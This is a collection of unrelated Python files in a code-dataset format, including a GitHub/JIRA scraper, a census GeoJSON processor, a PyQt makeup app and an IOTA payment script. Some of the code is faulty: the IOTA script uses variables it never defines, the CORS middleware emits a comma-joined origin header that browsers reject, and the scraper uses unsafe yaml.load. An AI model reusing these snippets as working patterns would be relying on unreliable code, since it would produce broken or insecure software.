gps_coordinates)\nmap_locations()\n\n\n","sub_path":"InstaLocTrack.py","file_name":"InstaLocTrack.py","file_ext":"py","file_size_in_byte":9555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"245339090","text":"import argparse\nimport os\nimport signal\nimport subprocess\n\nfrom _shutil import call_echo\n\n\ndef start_server(file=None, port=None, dev=True):\n script_root = os.path.realpath(os.path.dirname(__file__))\n movy_root = os.path.join(script_root, \"movy\")\n\n if not os.path.exists(os.path.join(movy_root, \"node_modules\")):\n call_echo([\"yarn\"], cwd=movy_root)\n\n launch_script = os.path.join(movy_root, \"bin\", \"movy.js\")\n args = [\n \"node\",\n launch_script,\n \"--no-open\",\n \"--content\",\n os.path.join(script_root, \"movyutils\"),\n ]\n\n if port is None:\n port = 5555\n args += [\"--port\", \"%d\" % port]\n\n if not dev:\n args += [\"--no-hot\"]\n\n args += [file]\n\n ps = subprocess.Popen(\n args,\n cwd=movy_root,\n # CTRL+C signals will be disabled in current process\n creationflags=0x00000200,\n )\n return ps\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-p\", \"--port\", type=int, default=None)\n parser.add_argument(\n \"file\", type=str, help=\"animation js file\", nargs=\"?\", default=None\n )\n\n args = parser.parse_args()\n if args.file is not None:\n file = args.file\n else:\n file = os.environ.get(\"MOVY_FILE\")\n\n ps = start_server(file, port=args.port)\n\n try:\n ps.wait()\n except KeyboardInterrupt:\n ps.send_signal(signal.CTRL_C_EVENT)\n","sub_path":"scripts/r/videoedit/start_movy_server.py","file_name":"start_movy_server.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"622521779","text":"from github3 import GitHub, login\nfrom jira import JIRA\nimport base64, yaml, json\n\nfrom django.db.models import When, Q\nfrom django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned\n\nfrom mysite.settings import BASE_DIR\nfrom osprdata.models import Pull, OSPRUser, OSPRGroup, Ticket\nfrom osprdata.secrets import ghpassword, jirapassword\n\ng = login(\"shaunagm\", password=ghpassword)\n\nj = JIRA(basic_auth=('oscm+opsr-stats-bot@edx.org', jirapassword),\n options={'server': 'https://openedx.atlassian.net/'})\n\n\n# Helper functions\ndef get_or_create_user(user_dict):\n\n name = user_dict['name'] if user_dict.get('name') else None\n github_username = user_dict['github_username'] if user_dict.get('github_username') else None\n jira_username = user_dict['jira_username'] if user_dict.get('jira_username') else None\n\n try:\n user = OSPRUser.objects.get(\n (Q(name=name) & Q(name__isnull=False)) |\n (Q(github_username=github_username) & Q(github_username__isnull=False)) |\n (Q(jira_username=jira_username) & Q(jira_username__isnull=False))\n )\n user.add_if_empty(name=name, github_username=github_username, jira_username=jira_username)\n except MultipleObjectsReturned:\n print(\"Duplicate user in DB: \", user_dict)\n return False\n except ObjectDoesNotExist:\n user = OSPRUser.objects.create(name=name, github_username=github_username, jira_username=jira_username)\n print(\"Creating user: \", user)\n return user\n\ndef update_membership(new_data, database_object, remove_extra=True):\n\n for person in new_data:\n user = get_or_create_user(person)\n if user in database_object.members.all():\n continue\n else:\n database_object.members.add(user)\n print(user, \" added\")\n\n if remove_extra:\n for person in database_object.members.all():\n pass\n # Need better way to check if not in database, maybe refactor get or create user\n # if person.name not in [user['name'] for user in new_data]:\n # database_object.members.remove(user)\n else:\n print(\"Skip removal of extra/missing users from database\")\n\n# Scrape new PRs from Github\n\ndef update_and_save_pull(pull_object, pull, created, g, repo, issue=None):\n if created:\n pull_object.title = pull.title\n pull_object.number = pull.number\n pull_object.date_created = pull.created_at\n pull_object.repo = repo.name\n pull_object.save()\n pull_object.update_status_and_dates(pull)\n if issue is None:\n issue = g.issue('edx', repo.name, pull.number) # Switch to issue due to limited Pull API\n pull_object.update_closer(issue)\n pull_object.is_ospr(issue)\n update_membership([{'github_username': comment.user} for comment in issue.iter_comments()], pull_object, remove_extra=False)\n\ndef get_new_prs_from_github_repo(g, repo, ospr_only):\n if ospr_only:\n pulls = repo.iter_issues(state=\"all\", labels='open-source-contribution', sort=\"updated\")\n else:\n pulls = repo.iter_pulls(state=\"all\", sort=\"updated\", direction=\"desc\")\n for pull in pulls:\n issue = pull if ospr_only else None\n if ospr_only:\n pull = repo.pull_request(pull.pull_request['html_url'].rsplit('/', 1)[-1])\n pull_object, created = Pull.objects.get_or_create(url=pull.html_url)\n print(\"Pull: \", pull.number)\n # if not created and pull_object.date_updated == pull.updated_at:\n # continue # When done with backlog switch this to \"break\"\n update_and_save_pull(pull_object, pull, created, g, repo, issue)\n\ndef get_prs_from_github(g, repo_name=None, ospr_only=False):\n if repo_name is None:\n edx = g.organization('edx')\n for repo in 
edx.iter_repos():\n print(\"Repo: \", repo.name)\n get_new_prs_from_github_repo(g, repo, ospr_only)\n else:\n print(\"Repo: \", repo_name)\n repo = g.repository('edx', repo_name)\n get_new_prs_from_github_repo(g, repo, ospr_only)\n\n\n# Scrape new tickets from JIRA\n\ndef update_and_save_ticket(ticket_object, ticket, created, g):\n if created:\n ticket_object.title = ticket.fields.summary\n ticket_object.number = ticket.key.split(\"-\")[1] # Get the OSPR-specific number\n ticket_object.date_created = ticket.fields.created\n ticket_object.project = ticket.fields.project\n ticket_object.ospr = True\n ticket_object.save()\n if ticket.fields.assignee:\n user, created = OSPRUser.objects.get_or_create(name=ticket.fields.assignee)\n ticket_object.assignee.add(user)\n if ticket.fields.resolution is not None:\n ticket_object.date_closed = ticket.fields.resolutiondate\n # NOTE: The easiest way to get the closed by info is to generate a custom field\n # in JIRA and reference that.\n ticket_object.update_status_and_dates(ticket)\n linked_pull = Pull.objects.filter(url=ticket.fields.customfield_10904).first()\n if linked_pull is not None:\n ticket_object.linked_pulls.add(linked_pull)\n print(\"linked ticket & pull: \", ticket_object, linked_pull)\n ticket_object.update_labels(ticket)\n\ndef get_new_tickets_from_JIRA(j):\n tickets = j.search_issues('project=ospr', maxResults=300)\n # Temporary - delete once backlog is retrieved\n # WAIT - this is not order updated, it's order created -- can we switch?\n next_tickets = j.search_issues('project=ospr', maxResults=1000, startAt=300)\n tickets += next_tickets\n for ticket in tickets:\n # NOTE: The URL below is wrong, it goes to the API url not the HTML url\n ticket_object, created = Ticket.objects.get_or_create(url=ticket._get_url(ticket.id))\n print(\"Ticket: \", ticket.key)\n if not created and ticket_object.date_updated == ticket.fields.updated:\n break\n update_and_save_ticket(ticket_object, ticket, created, j)\n\n# Update group membership\n\ndef update_internal_teams_and_users():\n # Uses the repo's json file and calls to JIRA and Github to create/update internal teams and users\n with open(BASE_DIR + '/osprdata/internal_team_info.yaml') as data_file:\n data = yaml.load(data_file)\n for team, team_dict in data.items():\n print(\"Team: \", team)\n group, created = OSPRGroup.objects.get_or_create(group_type=\"int\", name=team)\n group.superteam = team_dict['superteam']\n group.save()\n if team_dict['labels'] != []:\n group.set_labels(team_dict['labels'])\n if team_dict['repos'] != []:\n group.set_repos(team_dict['repos'])\n member_dict = [{'name': member_name} for member_name in team_dict['members']]\n print(\"members of team: \", member_dict)\n update_membership(member_dict, group, remove_extra=False)\n\ndef update_external_teams_and_users(g):\n # Uses people.yaml to create/update external teams and users.\n repo = g.repository(\"edx\", \"repo-tools-data\")\n people_data = repo.contents(\"people.yaml\")\n decoded_data = base64.b64decode(people_data.content).decode('utf-8')\n people = yaml.load(decoded_data)\n for username, userdata in people.items():\n jira_username = userdata['jira'] if userdata.get('jira') else None\n user = get_or_create_user({'name': userdata['name'], 'github_username': username, 'jira_username': jira_username})\n ### Standardize people.yaml, reuse repo-tools-data tools?\n if userdata['agreement'] is None: # This is missing some other ways people are labelled inactive.\n user.active = False\n user.save()\n if 
userdata.get('institution'):\n if userdata['institution'] == \"edX\":\n group, created = OSPRGroup.objects.get_or_create(group_type=\"msc\", name=\"edX yaml group\")\n else:\n group, created = OSPRGroup.objects.get_or_create(group_type=\"ext\", name=userdata['institution'])\n if created:\n if group.name in ['Arbisoft', 'BNOTIONS', 'Clarice', 'ExtensionEngine', 'OpenCraft']:\n group.is_contractor = True\n if userdata['agreement'] == \"institution\":\n group.is_institution_CLA = True\n if userdata['institution'] not in user.groups.all():\n group.members.add(user)\n group.save()\n else:\n group, created = OSPRGroup.objects.get_or_create(group_type=\"msc\", name=\"Miscellaneous Individuals\")\n group.members.add(user)\n\ndef update_github_org_membership(g):\n # Checks membership in EdX github org\n edx = g.organization('edx')\n members_on_github = [{'github_username': member.login} for member in edx.iter_members()]\n edx_db_group, created = OSPRGroup.objects.get_or_create(group_type=\"msc\", name=\"EdX Github Organization\")\n update_membership(members_on_github, edx_db_group, remove_extra=False)\n\ndef update_users_and_members(g):\n update_internal_teams_and_users()\n update_external_teams_and_users(g)\n update_github_org_membership(g)\n\n\n# Gets older data. Catches Github API timeout and waits. Uses Etags to determine what's been gotten.\ndef get_old_data(g, j):\n pass\n","sub_path":"ospr-site/osprdata/api_calls.py","file_name":"api_calls.py","file_ext":"py","file_size_in_byte":9185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"415995221","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 5 17:09:56 2020\nImplement linear regression with scikit learn\n@author: cindy\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\n\nrng = np.random.RandomState(1)\nx = 10 * rng.rand(50)\ny = 2 * x - 5 + rng.randn(50)\n#plt.scatter(x,y)\nmodels = LinearRegression(fit_intercept=True)\n# Add dimension of the x array to 2d (scikit learn needs data in 2d)\nnew_x = x[:,np.newaxis] \nmodel = models.fit(new_x,y)\nprint(model.coef_[0]) # slope\nprint(model.intercept_) # y intercept\nxfit = np.linspace(0,10,1000)\nyfit = model.predict(xfit[:,np.newaxis])\nplt.scatter(x,y,alpha=0.3)\nplt.plot(xfit,yfit,'r')\n","sub_path":"Regression/linear_regression_2.py","file_name":"linear_regression_2.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"444286311","text":"# 2. Celsius to Fahrenheit conversion\n# The formula to convert a temperature from Celsius to Fahrenheit is:\n\n# F = (C * 9/5) + 32\n\n# Write a function that takes a temperature in Celsius, converts it Fahrenheit, and returns the value.\n\ndef celsius_conversion():\n temperature = int(input(\"Enter a temperature in Celsius: \"))\n F = (temperature * 9/5) + 32\n return F\n\nprint(celsius_conversion())","sub_path":"02-week/2-wednesday/labs/j-ckie/02_celsius_to_fahrenheit.py","file_name":"02_celsius_to_fahrenheit.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"430708744","text":"from models import AllowedReferrer\n\nclass CORSMiddleware(object):\n def process_response(self, request, response):\n if 'key' in request.GET:\n referrers = AllowedReferrer.objects.filter(\n project__api_key=request.GET.get('key'))\\\n .values_list('url', flat=True)\n if referrers:\n response['Access-Control-Allow-Origin'] = ','.join(referrers)\n return response\n","sub_path":"server/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"59157914","text":"import numpy as np\nimport pandas as pd\nimport json\nfrom pprint import pprint\n\nwith open('data/gz_2010_36_140_00_500k.json') as f:\n tracts=json.load(f)\n\ndef load_df(file_path):\n df = pd.read_json(file_path)\n df.columns = df.iloc[0] ## first row as column names\n df = df.drop(df.index[0]) ## drop column name row\n return df\n\nhousing = load_df('data/housing/censusHousing.json')\npoverty_race = load_df('data/povertyrace/censusPovertyRace.json')\n\n### ADD MEDIAN HOME VALUE FOR OWNED HOME ###\n# https://www.census.gov/quickfacts/fact/note/US/HSG445217\nhousing['median_homevalue'] = pd.to_numeric(housing['DP04_0089E']) ## Estimate!!HOUSING TENURE!!Occupied housing units!!Owner-occupied\nhousing.loc[housing['median_homevalue']<0,'median_homevalue'] = None\n\n### ADD % HOMEOWNERSHIP COLUMN ###\n# The homeownership rate is computed by dividing the number of owner-occupied housing units by the number of occupied housing units or households\n# https://www.census.gov/quickfacts/fact/note/US/HSG445217\nhousing['DP04_0046E'] = pd.to_numeric(housing['DP04_0046E']) ## Estimate!!HOUSING TENURE!!Occupied housing units!!Owner-occupied\nhousing['DP04_0002E'] = pd.to_numeric(housing['DP04_0002E']) ## Estimate!!HOUSING OCCUPANCY!!Total housing units!!Occupied housing units\nhousing['pct_homeownership'] = housing['DP04_0046E'] / housing['DP04_0002E']\n\n### ADD % POVERTY COLUMN ###\npoverty_race['pct_poverty'] = pd.to_numeric(poverty_race['DP03_0119PE'])\npoverty_race.loc[poverty_race['pct_poverty']<0,'pct_poverty'] = None\npoverty_race['pct_poverty'] = poverty_race['pct_poverty']/100\n\n### ADD % NON-WHITE COLUMN ###\npoverty_race['pct_nonwhite'] = pd.to_numeric(poverty_race['DP05_0037PE'])\npoverty_race.loc[poverty_race['pct_nonwhite']<0,'pct_nonwhite'] = None\npoverty_race['pct_nonwhite'] = poverty_race['pct_nonwhite']/100\npoverty_race['pct_nonwhite'] = 1-poverty_race['pct_nonwhite']\n\n## ADD MORTGAGE % COLUMN ###\nhousing['pct_mortgage'] = pd.to_numeric(housing['DP04_0091PE'])\nhousing.loc[housing['pct_mortgage']<0,'pct_mortgage'] = None\nhousing['pct_mortgage'] = housing['pct_mortgage']/100\n\nhomeownership = housing[['NAME','GEO_ID','state','county','tract','pct_homeownership','DP04_0002E','DP04_0046E','median_homevalue','DP04_0089E','pct_mortgage','DP04_0091PE']]\n\n### ADD COLUMNS TO GEOJSON FILE ###\nnew_features = []\n\nfor tract in tracts['features']:\n homeownership_tract = homeownership[(homeownership['tract']==tract['properties']['TRACT']) & (homeownership['county']==tract['properties']['COUNTY'])]\n if len(homeownership_tract) == 1:\n if ~np.isnan(homeownership_tract.iloc[0]['pct_homeownership']):\n tract['properties']['pctHomeownership'] = homeownership_tract.iloc[0]['pct_homeownership']\n if ~np.isnan(homeownership_tract.iloc[0]['median_homevalue']):\n tract['properties']['medianHomevalue'] = homeownership_tract.iloc[0]['median_homevalue']\n if ~np.isnan(homeownership_tract.iloc[0]['pct_mortgage']):\n tract['properties']['pctMortgage'] = homeownership_tract.iloc[0]['pct_mortgage']\n povertyrace_tract = poverty_race[(poverty_race['tract']==tract['properties']['TRACT']) & (poverty_race['county']==tract['properties']['COUNTY'])]\n if len(povertyrace_tract) == 1:\n if ~np.isnan(povertyrace_tract.iloc[0]['pct_poverty']):\n tract['properties']['pctPoverty'] = povertyrace_tract.iloc[0]['pct_poverty']\n if ~np.isnan(povertyrace_tract.iloc[0]['pct_nonwhite']):\n tract['properties']['pctNonwhite'] = povertyrace_tract.iloc[0]['pct_nonwhite']\n\n if 
((len(povertyrace_tract) == 1) | (len(homeownership_tract) == 1)):\n new_features.append(tract)\n\n\nnew_tracts = {\"type\":\"FeatureCollection\",\"features\":new_features}\n# pprint(type(new_tracts))\nwith open('data/allCensus.json','w') as f:\n json.dump(new_tracts,f)\n","sub_path":"quant/all-census-columns.py","file_name":"all-census-columns.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"43027616","text":"\"\"\"djangoreactproject URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n\nfrom django.contrib import admin\nfrom django.urls import path, include\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('users/', include('Usuarios_k.urls')),\n path('categorias/', include('Categorias_k.urls')),\n path('cursos/', include('Curso_k.urls')),\n path('inscripciones/', include('Inscribe_k.urls')),\n path('eventos/', include('Evento_k.urls')),\n path('logros/', include('Logros_k.urls')),\n path('cupones/', include('Cupon_k.urls')),\n path('tutores/', include('Sigue_k.urls')),\n path('experiencia/', include('Experiencia_k.urls')),\n path('realiza/', include('Realiza_k.urls')),\n path('califica/', include('Califica_k.urls')),\n path('selecciona/', include('Selecciona_k.urls')),\n path('gana/', include('Gana_k.urls')),\n path('foros/', include('Foro_k.urls'))\n \n\n]\n","sub_path":"knowtured/knowtured/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"259339574","text":"import sys\n\nfrom PyQt5.QtWidgets import (\n QApplication, QDialog, QMainWindow, QMessageBox\n)\n\nimport PyQt5\nfrom PyQt5 import QtCore, QtGui, QtWidgets, uic\nfrom PyQt5.QtWidgets import QFileDialog, QPlainTextEdit\nfrom PyQt5.QtGui import QPixmap\nimport os\n\nfrom UI_Maker_Face import Ui_MainWindow\nimport cv2\nimport makeup\n\nclass Window(QMainWindow, Ui_MainWindow):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.setupUi(self)\n\n self.pushButton_3.clicked.connect(self.show_image_orig)\n self.pushButton.clicked.connect(self.run)\n self.pushButton_5.clicked.connect(self.show_image_targ)\n self.pushButton_2.clicked.connect(self.save_file)\n self.pushButton_4.clicked.connect(self.exit)\n self.arr_orig = []\n self.arr_targ = []\n self.arr_img = []\n\n\n def exit(self):\n sys.exit()\n\n def save_file(self):\n fileName = QFileDialog.getSaveFileName(self, str(\"Save File\"), \"C:/Users/ASUS/OneDrive - Trường ĐH CNTT - University of Information Technology/Máy tính/ComputerVision/Final_Project/final_project_of_Computer_Vision/Final_Image/untitled.jpg\", str(\"Images (*.png *.xpm *.jpg)\"))\n fileName = fileName[0]\n if fileName != None:\n fileName = list(fileName.split('/'))\n fileName = str(fileName[len(fileName) - 2]) + '/' + str(fileName[len(fileName)-1])\n img = self.arr_img[len(self.arr_img) - 1]\n cv2.imwrite(fileName, img)\n\n\n def run(self):\n self.read_import()\n\n def read_import(self):\n url_orig = self.arr_orig[len(self.arr_orig)-1]\n url_orig = list(url_orig.split('/'))\n url_orig = str(url_orig[len(url_orig)-2]) + '/' + str(url_orig[len(url_orig)-1])\n\n url_targ = self.arr_targ[len(self.arr_targ) - 1]\n url_targ = list(url_targ.split('/'))\n url_targ = str(url_targ[len(url_targ) - 2]) + '/' + str(url_targ[len(url_targ) - 1])\n\n img = makeup.makeup_main(url_orig, url_targ)\n\n img = self.crop_img(img)\n\n if len(self.arr_img) != 0:\n self.arr_img.pop(0)\n self.arr_img.append(img)\n\n scene = QtWidgets.QGraphicsScene(self.graphicsView_2)\n pixmap = self.convert_cv_qt(img)\n item = QtWidgets.QGraphicsPixmapItem(pixmap)\n scene.addItem(item)\n self.graphicsView_2.setScene(scene)\n\n def crop_img(self, img):\n w, h = img.shape[:2]\n for i in range(0, h - 1)[::-1]:\n if img[i][0][0] > 10:\n img = img[0:i, :]\n break\n return img\n\n def convert_cv_qt(self, cv_img):\n \"\"\"Convert from an opencv image to QPixmap\"\"\"\n rgb_image = cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB)\n h, w, ch = rgb_image.shape\n bytes_per_line = ch * w\n convert_to_Qt_format = PyQt5.QtGui.QImage(rgb_image.data, w, h, bytes_per_line, QtGui.QImage.Format_RGB888)\n p = convert_to_Qt_format.scaledToHeight(570)\n #p = convert_to_Qt_format\n return QPixmap.fromImage(p)\n\n\n # def pushButton_3_handler(self):\n # print('Button pressed')\n # self.open_dialog_box()\n\n # Mo hop thoai chon file local\n def open_dialog_box_orig(self):\n filename = QFileDialog.getOpenFileName(self, str(\"Open File\"), \"C:/Users/ASUS/OneDrive - Trường ĐH CNTT - University of Information Technology/Máy tính/ComputerVision/Final_Project/final_project_of_Computer_Vision/Original_Image\", str(\"Images (*.png *.xpm *.jpg)\"))\n path = filename[0]\n if len(self.arr_orig) != 0:\n self.arr_orig.pop(0)\n self.arr_orig.append(path)\n return path\n\n def open_dialog_box_targ(self):\n filename = QFileDialog.getOpenFileName(self, str(\"Open File\"), \"C:/Users/ASUS/OneDrive - Trường ĐH CNTT - University of Information Technology/Máy 
tính/ComputerVision/Final_Project/final_project_of_Computer_Vision/Target_Image\", str(\"Images (*.png *.xpm *.jpg)\"))\n path = filename[0]\n if len(self.arr_targ) != 0:\n self.arr_targ.pop(0)\n self.arr_targ.append(path)\n return path\n\n\n def show_image_orig(self):\n image_path = self.open_dialog_box_orig()\n if os.path.isfile(image_path):\n scene = QtWidgets.QGraphicsScene(self.graphicsView)\n pixmap = QPixmap(image_path).scaledToHeight(570)\n item = QtWidgets.QGraphicsPixmapItem(pixmap)\n scene.addItem(item)\n self.graphicsView.setScene(scene)\n\n def show_image_targ(self):\n image_path = self.open_dialog_box_targ()\n if os.path.isfile(image_path):\n scene = QtWidgets.QGraphicsScene(self.graphicsView_3)\n pixmap = QPixmap(image_path).scaledToHeight(570)\n item = QtWidgets.QGraphicsPixmapItem(pixmap)\n scene.addItem(item)\n self.graphicsView_3.setScene(scene)\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n win = Window()\n win.show()\n sys.exit(app.exec())","sub_path":"Source_code/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"471970337","text":"__author__ = 'Ankur Anand'\n\nbalance\nannualInterestRate\nmonthlyPaymentRate\ntotalAmountPaid = 0.0\nmonthlyInteresRate = annualInterestRate / 12.0\npreviousBalance = balance\nMinimumMonthlyPayment = 0.0\nMonthlyUnpaidBalance = 0.0\nfor i in range(1,13):\n\tprint (\"Month: \" + str(i))\n\tMinimumMonthlyPayment = monthlyPaymentRate * previousBalance\n\ttotalAmountPaid += MinimumMonthlyPayment\n\tprint(\"Minimum monthly payment: \" + \"%.2f\" % round(MinimumMonthlyPayment, 2))\n\tMonthlyUnpaidBalance = previousBalance - MinimumMonthlyPayment\n\tpreviousBalance = MonthlyUnpaidBalance + (monthlyInteresRate * MonthlyUnpaidBalance)\n\tprint(\"Remaining balance: \" + \"%.2f\" % round(previousBalance, 2))\nprint(\"Total paid: \" + \"%.2f\" % round(totalAmountPaid, 2))\nprint(\"Remaining balance: \" + \"%.2f\" % round(previousBalance, 2))","sub_path":"Pset2Q1.py","file_name":"Pset2Q1.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"512133670","text":"\r\n#-------------------------------------------------------------------------------#\r\n#-- PROJECT Smart Ride #\r\n# #\r\n#-- PROGRAM GOALS #\r\n#-- Implement IOTA to Transportation paradigm #\r\n# #\r\n#-- Programmers: Cris Thomas, Jiss Joseph Thomas #\r\n#-- References: IOTA #\r\n#-------------------------------------------------------------------------------#\r\n\r\nfrom iota import Iota\r\nfrom iota import Address\r\nimport time\r\nimport datetime\r\n# import RPi.GPIO as gpio\r\n\r\n# # Set RPi GPIO\r\n# gpio.setmode(gpio.BCM)\r\n# gpio.setup(40, gpio.OUT)\r\n# gpio.setup(38, gpio.OUT)\r\n# gpio.setup(36, gpio.OUT)\r\n# gpio.setup(32, gpio.OUT)\r\n\r\n# # Relay interfacings\r\n# relay_1_pin = 40\r\n# relay_2_pin = 38\r\n# relay_3_pin = 36\r\n# relay_4_pin = 32\r\n\r\n# # Function to check balance on the IOTA tangle. \r\n# def balance_check():\r\n\r\n# \tprint(\"Checking balance\")\r\n# \tbalance_result = iota_obj.get_balances(address)\r\n# \tbalance = balance_result['balances']\r\n# \treturn (balance[0])\r\n\r\n# # IOTA fullnode URL\r\n# iotaNode = \"https:#nodes.thetangle.org:443\"\r\n\r\n# # Creating an IOTA object\r\n# iota_obj = Iota(iotaNode, \"\")\r\n\r\n# # IOTA address\r\n# # Create your own address using Trinity Wallet\r\n# address = [Address(b'DESCRIBEYOURADDRESSHERE')]\r\n\r\n# # Obtain the current balance \r\n# currentbalance = balance_check()\r\n# prev_balance = currentbalance\r\n\r\n# Variables\r\nbalance = 0\r\nbalcheckcount = 0\r\nact_status = False\r\n\r\n# Main loop\r\nwhile True:\r\n\t\r\n\t# Check for balance every 5 seconds.\r\n\tif balcheckcount == 5:\r\n\t\tprint(\"Checking balance for address \", address)\r\n\t\t# currentbalance = balance_check()\r\n\t\tif currentbalance > prev_balance:\r\n\t\t\tbalance = balance + (currentbalance - prev_balance)\r\n\t\t\tprev_balance = currentbalance\r\n\t\tbalcheckcount = 0\r\n\r\n\t# Manage the activation status\r\n\tif balance > 0:\r\n\t\tif act_status == False:\r\n\t\t\tprint(\"Balance Received.... Activating.....\")\r\n\t\t\tact_status=True\r\n\t\tbalance = balance -1 \r\n\telse:\r\n\t\tif act_status == True:\r\n\t\t\tact_status=False\r\n\r\n\t# Interaction based in activation status\r\n\tif act_status == True:\r\n\t\t# gpio.output(40, gpio.HIGH)\r\n\t\t# gpio.output(38, gpio.HIGH)\r\n\t\t# gpio.output(36, gpio.HIGH)\r\n\t\t# gpio.output(32, gpio.HIGH)\r\n\r\n\t\ttime.sleep(5)\r\n\r\n\t\t# gpio.output(40, gpio.LOW)\r\n\t\t# gpio.output(38, gpio.LOW)\r\n\t\t# gpio.output(36, gpio.LOW)\r\n\t\t# gpio.output(32, gpio.LOW)\r\n \r\n\t\t# Print action\r\n\t\tprint(\"Action completed\")\r\n\r\n\t# Increase counter\r\n\tbalcheckcount = balcheckcount +1\r\n\r\n\t# Pause 1 sec.\r\n\ttime.sleep(1)\r\n","sub_path":"Project_Smart Ride_IOTA.py","file_name":"Project_Smart Ride_IOTA.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"278005023","text":"import math\nimport numpy as np\nimport numpy.linalg as linalg\nimport math\n\ndef Trans_matrix(phi, *args): \n\tt1,t2,t3 = args\n\treturn np.array( [(t1, 1/np.sqrt(3)*t2*np.exp(-2j*phi),\\\n\t\t\t\t\t\t\t\t\t np.sqrt(2./3)*t2*np.exp(-2j*phi)),\\\n\t\t\t\t\t\t(1/np.sqrt(3)*t2*np.exp(2j*phi), 1./3*(t1+2*t3), np.sqrt(2)/3*(t1-t3)),\\\n\t\t\t\t\t\t(np.sqrt(2./3)*t2*np.exp(2j*phi),np.sqrt(2)/3*(t1-t3), 1./3*(2*t1+t3))] )\n\ndef energies(ham_2d, args, NX = 40, NY = 40):\n \"\"\"Returns the array of energies associated with each of the wave vector from the\n 2D Brillouin zone. The hamiltonian must be of form ham(px,py,*args)\"\"\" \n energies = []\n pxrange = np.linspace(-math.pi,math.pi, NX)\n pyrange = np.linspace(-math.pi,math.pi, NY)\n \n for px in pxrange:\n \tenergies.append([])\n \tfor py in pyrange:\n \t\tenergies[-1].append(linalg.eigvalsh(ham_2d(px,py,*args)))\n \n pxgrid, pygrid = np.meshgrid(pxrange,pyrange,indexing = 'ij')\n \t\t\t\t\t\t\n energies = np.array(energies).transpose(2,0,1)\n return pxgrid, pygrid, energies\n\ndef stripe_energies(stripe_ham, args, NX = 60, plim = (0,2*math.pi)):\n energies = []\n pyrange = np.linspace(plim[0],plim[1], NX)\n \n for py in pyrange:\n \tenergies.append(linalg.eigvalsh(stripe_ham(py,*args)))\n \t\t\t\t\t\t\n energies = np.array(energies).transpose()\n return pyrange, energies\n\ndef slice_of_energies(ham, px, args, NX = 60):\n energies = []\n pyrange = np.linspace(0,2*math.pi, NX)\n \n for py in pyrange:\n \tenergies.append(linalg.eigvalsh(ham(px, py,*args)))\n \t\t\t\t\t\t\n energies = np.array(energies).transpose()\n return pyrange, energies\n","sub_path":"science/spin_orbit/tb_model/tblib.py","file_name":"tblib.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"391230512","text":"\"\"\" enumeration of systematics for easy looping \"\"\"\n\njet_syst_list = []\nmuon_syst_list = []\n\njet_pt_systs = {\"jet_pt\":\"pt\",\n \"jet_pt_jes_up\":\"pt_jes_up\",\"jet_pt_jes_down\":\"pt_jes_down\",\n \"jet_pt_jer_up\":\"pt_jer_up\",\"jet_pt_jer_down\":\"pt_jer_down\"}\n\njet_weight_systs = {\"jetweight\":\"weight\",\n \"jetweight_pu_up\":\"weight_pu_up\",\n \"jetweight_pu_down\":\"weight_pu_down\",\n \"jetweight_trigger_up\":\"weight_trigger_up\",\n \"jetweight_trigger_down\":\"weight_trigger_down\"}\n\nmuon_weight_systs = {\"muweight\":\"weight\",\n \"muweight_trigger_up\":\"weight_trigger_up\",\n \"muweight_trigger_down\":\"weight_trigger_down\",\n \"muweight_id_up\":\"weight_id_up\" ,\"muweight_id_down\":\"weight_id_down\",\n \"muweight_iso_up\":\"weight_iso_up\" ,\"muweight_iso_down\":\"weight_iso_down\",\n \"muweight_pu_up\":\"weight_pu_up\" ,\"muweight_pu_down\":\"weight_pu_down\"}\n","sub_path":"dazsle_hbb_recipes/plots/systematics.py","file_name":"systematics.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
